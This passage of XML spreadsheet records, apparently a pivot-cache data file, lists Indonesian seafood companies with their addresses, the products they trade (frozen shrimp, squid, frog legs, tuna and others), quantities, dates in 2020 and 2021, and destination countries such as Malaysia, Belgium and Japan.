    <s v="Viet Nam"/>
  </r>
  <r>
    <n v="21118"/>
    <x v="297"/>
    <s v="PD. MAJU JAYA"/>
    <s v="Jl. Adi Sucipto Belakang Eks Bioskop Indah Raya Km 5,8, Kel. Sungai Raya, Kec. Sungai Raya, Kabupaten Kubu Raya&lt;br&gt;Kalimantan Barat"/>
    <n v="20"/>
    <s v="Udang Segar"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Pontianak"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="21119"/>
    <x v="297"/>
    <s v="PD. MAJU JAYA"/>
    <s v="Jl. Adi Sucipto Belakang Eks Bioskop Indah Raya Km 5,8, Kel. Sungai Raya, Kec. Sungai Raya, Kabupaten Kubu Raya&lt;br&gt;Kalimantan Barat"/>
    <n v="20"/>
    <s v="Ikan Demersal Segar (Senangin, Kerapu, Bawal, Kakap, Kurau, Barramundi)"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Pontianak"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="21120"/>
    <x v="297"/>
    <s v="PD. MAJU JAYA"/>
    <s v="Jl. Adi Sucipto Belakang Eks Bioskop Indah Raya Km 5,8, Kel. Sungai Raya, Kec. Sungai Raya, Kabupaten Kubu Raya&lt;br&gt;Kalimantan Barat"/>
    <n v="20"/>
    <s v="Ikan Pelagis Segar (Tenggiri)"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Pontianak"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="21121"/>
    <x v="297"/>
    <s v="PD. MAJU JAYA"/>
    <s v="Jl. Adi Sucipto Belakang Eks Bioskop Indah Raya Km 5,8, Kel. Sungai Raya, Kec. Sungai Raya, Kabupaten Kubu Raya&lt;br&gt;Kalimantan Barat"/>
    <n v="20"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="70000"/>
    <s v="Kota Pontianak"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20846"/>
    <x v="236"/>
    <s v="PT. HASIL LAUT BERSAMA"/>
    <s v="Jl. Garuda, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Kering"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Cirebon"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20289"/>
    <x v="298"/>
    <s v="CV, BAHAGIA"/>
    <s v="Jl, Gabion No,999 Pelabuhan Perikanan Samudera Belawan, Kel, Bagan Deli, Kec, Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Segar (Tongkol, Kembung, Salem, Sarden, Selayang, Aso-aso, Tenggiri)"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="25000"/>
    <s v="Kota Medan"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="16612"/>
    <x v="299"/>
    <s v="KOPERASI KERAPU"/>
    <s v="Jl. Dermaga No.8, Kel. Purnama, Kec. Dumai Barat, Kota Dumai&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Demersal Segar (Senangin, Manyung, Kerapu, Bawal, Kakap)"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="1440"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="17375"/>
    <x v="195"/>
    <s v="PT. YAKIN PASIFIK TUNA"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Lampulo, Jl. Sisingamangaraja Ujung, Kel. Lampulo, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Layang, Cakalang, Tetengkek, Selar Kuning)"/>
    <d v="2020-03-20T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="19819"/>
    <x v="300"/>
    <s v="UD. BERDIKARI"/>
    <s v="Jl. Amir Hamzah LK II, Kel. Tanjung Balai Kota IV, Kec. Tanjung Balai Utara, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="19820"/>
    <x v="300"/>
    <s v="UD. BERDIKARI"/>
    <s v="Jl. Amir Hamzah LK II, Kel. Tanjung Balai Kota IV, Kec. Tanjung Balai Utara, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Beku"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="19821"/>
    <x v="300"/>
    <s v="UD. BERDIKARI"/>
    <s v="Jl. Amir Hamzah LK II, Kel. Tanjung Balai Kota IV, Kec. Tanjung Balai Utara, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="19822"/>
    <x v="300"/>
    <s v="UD. BERDIKARI"/>
    <s v="Jl. Amir Hamzah LK II, Kel. Tanjung Balai Kota IV, Kec. Tanjung Balai Utara, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Beku"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="19917"/>
    <x v="249"/>
    <s v="PT. SUMBER MINA SAMUDERA"/>
    <s v="Jl. Ikan Tuna III No.1A Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="Viet Nam"/>
  </r>
  <r>
    <n v="20035"/>
    <x v="301"/>
    <s v="CV. SEA MALAKA TRADE"/>
    <s v="Jl. Ampera Dusun V, Kel. Bagan Asahan Pekan, Kec. Tanjung Balai, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Segar (Tongkol, Kembung, Selar, Tenggiri)"/>
    <d v="2020-05-15T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20036"/>
    <x v="301"/>
    <s v="CV. SEA MALAKA TRADE"/>
    <s v="Jl. Ampera Dusun V, Kel. Bagan Asahan Pekan, Kec. Tanjung Balai, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Segar (Sebelah, Senangin, Kerapu, Jenaha, Merah, Kakap, Kurisi, Ayam-ayam)"/>
    <d v="2020-05-15T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20037"/>
    <x v="301"/>
    <s v="CV. SEA MALAKA TRADE"/>
    <s v="Jl. Ampera Dusun V, Kel. Bagan Asahan Pekan, Kec. Tanjung Balai, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Kupas Beku"/>
    <d v="2020-05-15T00:00:00"/>
    <n v="40000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20038"/>
    <x v="301"/>
    <s v="CV. SEA MALAKA TRADE"/>
    <s v="Jl. Ampera Dusun V, Kel. Bagan Asahan Pekan, Kec. Tanjung Balai, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Air Tawar Segar (Lele, Jurung, Patin, Gabus)"/>
    <d v="2020-05-15T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20251"/>
    <x v="220"/>
    <s v="PT. DELTA AEROSUPPORT"/>
    <s v="Desa Mindahan RT 02 RW 01, Kec. Batealit, Kabupaten Jepara&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2020-06-09T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20252"/>
    <x v="220"/>
    <s v="PT. DELTA AEROSUPPORT"/>
    <s v="Desa Mindahan RT 02 RW 01, Kec. Batealit, Kabupaten Jepara&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Segar"/>
    <d v="2020-06-09T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20583"/>
    <x v="302"/>
    <s v="KOPERASI PANIPAHAN SEJAHTERA"/>
    <s v="Jl. Bakti No.976, Kel. Panipahan Darat, Kec. Pasir Limau Kapas, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Udang Segar"/>
    <d v="2020-08-12T00:00:00"/>
    <n v="96000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20584"/>
    <x v="302"/>
    <s v="KOPERASI PANIPAHAN SEJAHTERA"/>
    <s v="Jl. Bakti No.976, Kel. Panipahan Darat, Kec. Pasir Limau Kapas, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-08-12T00:00:00"/>
    <n v="2400"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20585"/>
    <x v="302"/>
    <s v="KOPERASI PANIPAHAN SEJAHTERA"/>
    <s v="Jl. Bakti No.976, Kel. Panipahan Darat, Kec. Pasir Limau Kapas, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Kerang Segar"/>
    <d v="2020-08-12T00:00:00"/>
    <n v="35000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20586"/>
    <x v="302"/>
    <s v="KOPERASI PANIPAHAN SEJAHTERA"/>
    <s v="Jl. Bakti No.976, Kel. Panipahan Darat, Kec. Pasir Limau Kapas, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Gurita Segar"/>
    <d v="2020-08-12T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20587"/>
    <x v="302"/>
    <s v="KOPERASI PANIPAHAN SEJAHTERA"/>
    <s v="Jl. Bakti No.976, Kel. Panipahan Darat, Kec. Pasir Limau Kapas, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Cumi-Cumi Segar"/>
    <d v="2020-08-12T00:00:00"/>
    <n v="1800"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20588"/>
    <x v="302"/>
    <s v="KOPERASI PANIPAHAN SEJAHTERA"/>
    <s v="Jl. Bakti No.976, Kel. Panipahan Darat, Kec. Pasir Limau Kapas, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Asin Kering"/>
    <d v="2020-08-12T00:00:00"/>
    <n v="14400"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20589"/>
    <x v="302"/>
    <s v="KOPERASI PANIPAHAN SEJAHTERA"/>
    <s v="Jl. Bakti No.976, Kel. Panipahan Darat, Kec. Pasir Limau Kapas, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Rajungan Segar"/>
    <d v="2020-08-12T00:00:00"/>
    <n v="1800"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20590"/>
    <x v="302"/>
    <s v="KOPERASI PANIPAHAN SEJAHTERA"/>
    <s v="Jl. Bakti No.976, Kel. Panipahan Darat, Kec. Pasir Limau Kapas, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Kerang Hidup"/>
    <d v="2020-08-12T00:00:00"/>
    <n v="9000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20633"/>
    <x v="94"/>
    <s v="CV. SINAR TIRTA"/>
    <s v="Jl. Rembang Industri VII/3 Pier Pasuruan, Kel. Pejangkungan, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Segar (Sotong, Cumi Karet, Gurita, Semampar, Cumi-cumi)"/>
    <d v="2020-07-20T00:00:00"/>
    <n v="6000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20729"/>
    <x v="105"/>
    <s v="PT. SEAFOOD SAMUDERA PACIFIC"/>
    <s v="Jl. Gabion No.15, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Teri, Baby Tuna, Barakuda, Tude, Tongkol, Gabus Laut, Julung-julung, Makarel, Lemadang, Selar, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-06-12T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20731"/>
    <x v="105"/>
    <s v="PT. SEAFOOD SAMUDERA PACIFIC"/>
    <s v="Jl. Gabion No.15, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Scallop Beku"/>
    <d v="2020-06-12T00:00:00"/>
    <n v="40000"/>
    <m/>
    <s v="Viet Nam"/>
  </r>
  <r>
    <n v="20733"/>
    <x v="105"/>
    <s v="PT. SEAFOOD SAMUDERA PACIFIC"/>
    <s v="Jl. Gabion No.15, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Beku"/>
    <d v="2020-06-12T00:00:00"/>
    <n v="40000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20768"/>
    <x v="303"/>
    <s v="PT. HOLI MINA JAYA"/>
    <s v="Komplek UPTD PPI Ujung Baroh, Jl. TPI, Kel. Ujong Baroh, Kec. Johan Pahlawan, Kabupaten Aceh Barat&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Udang Beku"/>
    <d v="2020-10-27T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20771"/>
    <x v="301"/>
    <s v="CV. SEA MALAKA TRADE"/>
    <s v="Jl. Ampera Dusun V, Kel. Bagan Asahan Pekan, Kec. Tanjung Balai, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Kering"/>
    <d v="2020-05-15T00:00:00"/>
    <n v="365000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20772"/>
    <x v="301"/>
    <s v="CV. SEA MALAKA TRADE"/>
    <s v="Jl. Ampera Dusun V, Kel. Bagan Asahan Pekan, Kec. Tanjung Balai, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Asin Kering"/>
    <d v="2020-05-15T00:00:00"/>
    <n v="183000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20822"/>
    <x v="254"/>
    <s v="PT. INTI LAUTAN FAJAR ABADI"/>
    <s v="Jl. Wonokoyo 1 RT 01 RW 06, Kel. Wonokoyo, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-05-26T00:00:00"/>
    <n v="27500"/>
    <m/>
    <s v="Viet Nam"/>
  </r>
  <r>
    <n v="20823"/>
    <x v="254"/>
    <s v="PT. INTI LAUTAN FAJAR ABADI"/>
    <s v="Jl. Wonokoyo 1 RT 01 RW 06, Kel. Wonokoyo, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Telur Ikan Beku"/>
    <d v="2020-05-26T00:00:00"/>
    <n v="65000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="19361"/>
    <x v="156"/>
    <s v="UD. ANUGERAH BINTANG CEMERLANG"/>
    <s v="Jl. Bambu Runcing No.99, Kel. Bonto Talassa, Kec. Simbang, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Beku"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="78000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Namibia"/>
  </r>
  <r>
    <n v="19559"/>
    <x v="114"/>
    <s v="CV. ANUGERAH BAHARI MANDIRI"/>
    <s v="Jl. Kapasa Raya No.38A, Kel. Kapasa, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-03-19T00:00:00"/>
    <n v="75000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Ecuador"/>
  </r>
  <r>
    <n v="19458"/>
    <x v="166"/>
    <s v="PT. TRIDAYA ERAMINA BAHARI"/>
    <s v="Jl. Muara Baru Ujung Blok K No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Beku"/>
    <d v="2020-06-29T00:00:00"/>
    <n v="7000"/>
    <m/>
    <s v="Germany"/>
  </r>
  <r>
    <n v="19584"/>
    <x v="238"/>
    <s v="PT. RED RIBBON INDONESIA"/>
    <s v="Jl. Muara Baru Ujung Perum Prasarana Perikanan Samudera Blok K-5, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Paha Kodok Beku"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="400000"/>
    <m/>
    <s v="Belgium"/>
  </r>
  <r>
    <n v="20743"/>
    <x v="304"/>
    <s v="PT. SUMBER PANGAN NUSANTARA"/>
    <s v="Jl. Brigjen Katamso No.24-26, Kel. Kampung Dalem, Kec. Kediri, Kota Kediri&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Paha Kodok Beku"/>
    <d v="2020-05-20T00:00:00"/>
    <n v="34000"/>
    <m/>
    <s v="Belgium"/>
  </r>
  <r>
    <n v="20909"/>
    <x v="151"/>
    <s v="PT. SURYA ALAM TUNGGAL"/>
    <s v="Jl. Raya Tropodo No.126, Kel. Tropodo, Kec. Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Paha Kodok Beku"/>
    <d v="2020-05-20T00:00:00"/>
    <n v="936000"/>
    <m/>
    <s v="Belgium"/>
  </r>
  <r>
    <n v="21125"/>
    <x v="149"/>
    <s v="PT. SEKAR BUMI, TBK PLANT I"/>
    <s v="Jl. Jenggolo 2/17, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Paha Kodok Beku"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="297652"/>
    <m/>
    <s v="Belgium"/>
  </r>
  <r>
    <n v="19370"/>
    <x v="305"/>
    <s v="CV. HASIL ALAMINDO"/>
    <s v="Jl. Semarang - Demak Km 7, Kel. Banjardowo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Paha Kodok Beku"/>
    <d v="2020-05-11T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="France"/>
  </r>
  <r>
    <n v="19457"/>
    <x v="166"/>
    <s v="PT. TRIDAYA ERAMINA BAHARI"/>
    <s v="Jl. Muara Baru Ujung Blok K No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Lencam, Kerapu, Kakatua, Kakap, Barramundi)"/>
    <d v="2020-06-29T00:00:00"/>
    <n v="80000"/>
    <m/>
    <s v="France"/>
  </r>
  <r>
    <n v="20423"/>
    <x v="306"/>
    <s v="PT, SUMBER PANGAN NUSANTARA"/>
    <s v="Jl, Raya Buduran No,555, Kel, Buduran, Kec, Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Paha Kodok Beku"/>
    <d v="2020-05-26T00:00:00"/>
    <n v="450000"/>
    <m/>
    <s v="France"/>
  </r>
  <r>
    <n v="20700"/>
    <x v="307"/>
    <s v="PT, AGUNG JAYASARI SAKTI"/>
    <s v="Jl, Raya Palembang - Prabumulih Km 29, Kel, Palem Raya, Kec, Indralaya Utara, Kabupaten Ogan Ilir&lt;br&gt;Sumatera Selatan"/>
    <n v="9"/>
    <s v="Paha Kodok Beku"/>
    <d v="2020-07-01T00:00:00"/>
    <n v="212001"/>
    <m/>
    <s v="France"/>
  </r>
  <r>
    <n v="20701"/>
    <x v="307"/>
    <s v="PT. AGUNG JAYASARI SAKTI"/>
    <s v="Jl. Raya Palembang - Prabumulih Km 29, Kel. Palem Raya, Kec. Indralaya Utara, Kabupaten Ogan Ilir&lt;br&gt;Sumatera Selatan"/>
    <n v="9"/>
    <s v="Paha Kodok Masak Beku"/>
    <d v="2020-07-01T00:00:00"/>
    <n v="7000"/>
    <m/>
    <s v="France"/>
  </r>
  <r>
    <n v="21176"/>
    <x v="260"/>
    <s v="PT. SAMUDRA KENCANA MINA"/>
    <s v="Pergudangan Central Square Blok E 31 Jl. Ahmad Yani No. 41-43, Kel. Keboansikep, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="70000"/>
    <m/>
    <s v="Greece"/>
  </r>
  <r>
    <n v="19583"/>
    <x v="238"/>
    <s v="PT. RED RIBBON INDONESIA"/>
    <s v="Jl. Muara Baru Ujung Perum Prasarana Perikanan Samudera Blok K-5, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="250000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bekasi, Kota Surakarta, Kota Surabaya, Kabupaten Tangerang, Kabupaten Gianyar, Kota Balikpapan, Kota Makassar"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="19736"/>
    <x v="237"/>
    <s v="PT. KIU KIU FISHERY"/>
    <s v="Jl. Tuna II Blok K 7 B Pelabuhan Perikanan Samudera Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-02-24T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Cirebon, Kabupaten Pati"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21242"/>
    <x v="7"/>
    <s v="PT. SINAR SEJAHTERA SENTOSA"/>
    <s v="Jl. Muara Baru Ujung Blok E No.2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku"/>
    <d v="2020-07-28T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Denpasar"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20031"/>
    <x v="136"/>
    <s v="PT. INDOFLORA CIPTA MANDIRI"/>
    <s v="Jl. Pandanlandung No.34 A, Kel. Pandanlandung, Kec. Wagir, Kabupaten Malang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tepung Agar-agar"/>
    <d v="2020-05-01T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Bandung, Kota Cirebon, Kabupaten Malang, Kota Malang, Kota Pasuruan, Kota Surabaya, Kota Makassar"/>
    <s v="India"/>
  </r>
  <r>
    <n v="20944"/>
    <x v="308"/>
    <s v="CV. PESONA MANDIRI"/>
    <s v="Jl. Cumi-cumi No.10, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Gulama, Lencam, Senangin, Kerapu, Layur, Bawal, Kakap, Ayam-ayam, Kuro, Tonang)"/>
    <d v="2020-06-18T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Jakarta Utara, Kabupaten Sidoarjo, Kabupaten Lamongan, Kota Pasuruan"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19446"/>
    <x v="309"/>
    <s v="PT. RUBELLI INDONESIA"/>
    <s v="Taman Pergudangan dan Perkantoran Blok C8, Jl. Muara Baru Raya No. 30 Kp. Luar Batang, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Layang, Cakalang, Alaska Pollock)"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21370"/>
    <x v="201"/>
    <s v="PT. LUCKY SAMUDRA PRATAMA"/>
    <s v="Jl. Muara Baru Ujung Blok F No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Teri, Lemuru, Tembang, Kembung, Japuh, Selar, Layang, Sunglir, Selangat)"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="90000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara, Kota Tangerang"/>
    <s v="China"/>
  </r>
  <r>
    <n v="20942"/>
    <x v="223"/>
    <s v="PT, INSAN CITRAPRIMA SEJAHTERA"/>
    <s v="Jl, Raya Jenu - Merak Urak No,148 C, Desa Sekardadi, Kec, Jenu, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Himego Kering"/>
    <d v="2020-05-15T00:00:00"/>
    <n v="44000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20204"/>
    <x v="92"/>
    <s v="CV. SUMBER LAUT REJEKI"/>
    <s v="Jl. Pelelangan Baru Dermaga 1 No.28-29 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2020-05-13T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="20945"/>
    <x v="308"/>
    <s v="CV. PESONA MANDIRI"/>
    <s v="Jl. Cumi-cumi No.10, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Julung-julung, Kembung, Talang-talang, Selar, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-06-18T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Jakarta Pusat, Kota Probolinggo"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19402"/>
    <x v="202"/>
    <s v="PT. MINA USAHA HARAPAN"/>
    <s v="Jl. Sultan Hasanuddin, Kompleks PPN Tantui Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-02-06T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Barat, Kota Surabaya"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="19403"/>
    <x v="202"/>
    <s v="PT. MINA USAHA HARAPAN"/>
    <s v="Jl. Sultan Hasanuddin, Kompleks PPN Tantui Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-02-06T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Barat, Kota Surabaya"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20066"/>
    <x v="196"/>
    <s v="PT. HARTA SAMUDRA"/>
    <s v="Desa Daeo Majiko, Kec. Morotai Selatan, Kabupaten Pulau Morotai&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Tuna Segar"/>
    <d v="2020-03-18T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara, Kota Denpasar"/>
